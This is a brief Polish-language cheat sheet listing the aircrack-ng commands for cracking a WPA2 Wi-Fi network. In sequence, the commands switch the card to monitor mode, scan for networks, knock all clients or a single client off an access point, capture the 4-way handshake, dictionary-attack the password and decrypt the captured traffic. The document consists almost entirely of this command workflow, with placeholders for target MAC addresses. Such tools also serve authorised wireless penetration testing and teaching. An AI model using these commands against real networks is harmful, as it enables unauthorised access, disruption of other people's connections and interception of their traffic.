1. Przejście w tryb monitorowania.
airmon-ng start wlan0 |
2. Skanowanie sieci.
airodump-ng wlan0mon |
3. Nasłuchiwanie sieci WLAN.
airodump-ng -c 11 -a --bssid [MAC_AP] wlan0mon |
4. Rozłączenie wszystkich klientów WLAN.
aireplay-ng -0 5 -a [MAC_AP] wlan0mon |
5. Rozłączenie pojedyńczego klienta WLAN.
aireplay-ng -0 2 -a [MAC_AP] -c [MAC_klienta] wlan0mon |
6. Zapisanie 4-way handshake sieci WLAN.
airodump-ng --bssid [MAC_AP] -c 11 -w nazwaPliku wlan0mon |
7. Proces odzyskiwania hasła.
aircrack-ng -w [nazwa_slownika] [nazwa_pliku.cap] |
8. Odszyfrowywanie przechwyconych pakietów (WPA2).
airdecap-ng -p HasloWLAN NazwaPliku.cap -e "SSID WLAN" |